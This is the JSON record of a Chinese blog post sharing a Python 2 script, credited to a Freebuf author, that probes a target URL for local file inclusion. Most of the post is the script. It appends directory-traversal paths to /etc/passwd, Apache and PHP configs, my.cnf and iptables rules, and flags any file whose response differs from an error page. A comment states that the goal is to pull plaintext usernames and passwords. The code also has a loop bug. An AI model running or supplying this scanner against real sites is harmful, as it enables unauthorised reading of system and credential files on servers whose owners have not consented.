{"id":413,"date":"2014-07-05T06:19:24","date_gmt":"2014-07-05T06:19:24","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=413"},"modified":"2014-07-05T06:19:24","modified_gmt":"2014-07-05T06:19:24","slug":"%e6%8e%a2%e6%b5%8b%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e7%9a%84python%e8%84%9a%e6%9c%acbak","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/413.html","title":{"rendered":"\u63a2\u6d4b\u672c\u5730\u6587\u4ef6\u5305\u542b\u7684Python\u811a\u672c[bak]"},"content":{"rendered":"<p>\u7528Python\u5199\u7684\u68c0\u6d4b\u672c\u5730\u6587\u4ef6\u5305\u542b\u7684\u5c0f\u5de5\u5177\uff0c\u53ef\u4ee5\u6839\u636e\u81ea\u5df1\u7684\u9700\u6c42\/\u7ecf\u9a8c\u81ea\u5df1\u6dfb\u52a0\u6587\u4ef6\u8def\u5f84\uff1a<\/p>\n<pre class=\"lang:python decode:true \">#!\/usr\/bin\/env python\n#-*-coding:utf-8-*-\n\nimport urllib2\nimport sys\nvar1=0\nvar2=0\nprint (\"-----------------------------------------------------\")\nprint (\"|           usage:py_detect_LFI.py site url         |\")\nprint (\"|this url like http:\/\/www.google.com\/index.php?id=  |\")\nprint (\"       writed by eip_0x[Freebuf],just 4 fun         |\")\nprint (\"-----------------------------------------------------\")\n\nsite0=sys.argv[1]+'\/kfdsjkf7675637d.txt'\t#\u8bbf\u95ee\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u6587\u4ef6\u83b7\u53d6\u8fd4\u56de\u9519\u8bef\u9875\u9762\u7684length\u4fe1\u606f\nreq0=urllib2.Request(site0)\nconn0=urllib2.urlopen(req0)\n\nwhile 1:\n    data0=conn0.read(4072)\t#\u9519\u8bef\u9875\u9762\u7684\u5185\u5bb9\n    if not len(data0):\n        break\n\npaths1=['\/etc\/passwd','..\/etc\/passwd','..\/..\/etc\/passwd','..\/..\/..\/etc\/passwd','..\/..\/..\/..\/etc\/passwd','..\/..\/..\/..\/..\/etc\/passwd','..\/..\/..\/..\/..\/..\/etc\/passwd','..\/..\/..\/..\/..\/..\/..\/etc\/passwd','..\/..\/..\/..\/..\/..\/..\/etc\/passwd','..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd','..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd','..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd']\npaths2=['\/usr\/local\/app\/apache2\/conf\/httpd.conf','\/usr\/local\/apache2\/conf\/httpd.conf','\/usr\/local\/app\/apache2\/conf\/extra\/httpd-vhosts.conf','\/usr\/local\/app\/php5\/lib\/php.ini','\/etc\/sysconfig\/iptables','\/etc\/httpd\/conf\/httpd.conf','\/etc\/my.cnf','\/etc\/issue','\/etc\/redhat-release','\/usr\/local\/apche\/conf\/httpd.conf','\/etc\/httpd\/conf\/httpd.conf']\n\nfor path in paths1:\t#\u9996\u5148\u67e5\u627e'\/etc\/passwd'\u6587\u4ef6\u662f\u5426\u5b58\u5728\n\tsite=sys.argv[1]+path\n\treq=urllib2.Request(site)\n\tconn=urllib2.urlopen(req)\n\twhile 1:\n\t\tdata=conn.read(4072)\n\t\tif not len(data0):\n\t\t\tbreak\n\n\t\tif len(data)!=len(data0):\n\t\t\tprint path,\" this file has been found!!!!u r lucky and have fun!!!!\"\n\n\t\tfor path2 in paths2:\t#\u5728\u67e5\u627e\u5230\u4e86'\/etc\/passwd'\u6587\u4ef6\u4e4b\u540e\u518d\u67e5\u627e\u914d\u7f6e\u6587\u4ef6\uff0c\u5e0c\u671b\u80fd\u4ece\u4e2d\u8bfb\u53d6\u51fa\u7528\u6237\u540d\u5bc6\u7801\u7684\u660e\u6587\u4fe1\u606f\n\t\t\tpath2ok=path.replace(\"\/etc\/passwd\",path2)\t#replace(\"\u67e5\u627e\u7684\u5185\u5bb9\"\uff0c\"\u66ff\u6362\u540e\u7684\u5185\u5bb9\"[\uff0c\u6b21\u6570])\uff0c\u66ff\u6362\u6b21\u6570\u53ef\u4ee5\u4e3a\u7a7a\uff0c\u5373\u8868\u793a\u66ff\u6362\u6240\u6709\n\t\t\tsite2=sys.argv[1]+path2ok\n\t\t\treq2=urllib2.Request(site2)\n\t\t\tconn2=urllib2.urlopen(req2)\n\t\t\twhile 1:\n\t\t\t\tdata2=conn2.read(4072)\n\t\t\t\tif not len(data2):\n\t\t\t\t\tbreak\n\t\t\t\tif len(data2)!=len(data0):\n\t\t\t\t\tprint path2,\"this file has been found!!\"<\/pre>\n<p>\u5982\u4ee3\u7801\u4e2d\u6240\u793a\uff0c\u811a\u672c\u662f\u4eceFreebuf\u4e0a\u641c\u96c6\u8fc7\u6765\u7684\uff0c\u4e0a\u9762\u8fd8\u6709\u597d\u591a\u597d\u4e1c\u897f\uff0c\u503c\u5f97\u4f60\u53bb\u5b66\u4e60\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u7528Python\u5199\u7684\u68c0\u6d4b\u672c\u5730\u6587\u4ef6\u5305\u542b\u7684\u5c0f\u5de5\u5177\uff0c\u53ef\u4ee5\u6839\u636e\u81ea\u5df1\u7684\u9700\u6c42\/\u7ecf\u9a8c\u81ea\u5df1\u6dfb\u52a0\u6587\u4ef6\u8def\u5f84\uff1a #!\/usr\/bin\/ [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,25,12],"tags":[197,8,198],"class_list":["post-413","post","type-post","status-publish","format-standard","hentry","category-programing","category-security","category-tools","tag-lfi","tag-python","tag-urllib2"],"views":2006,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=413"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/413\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}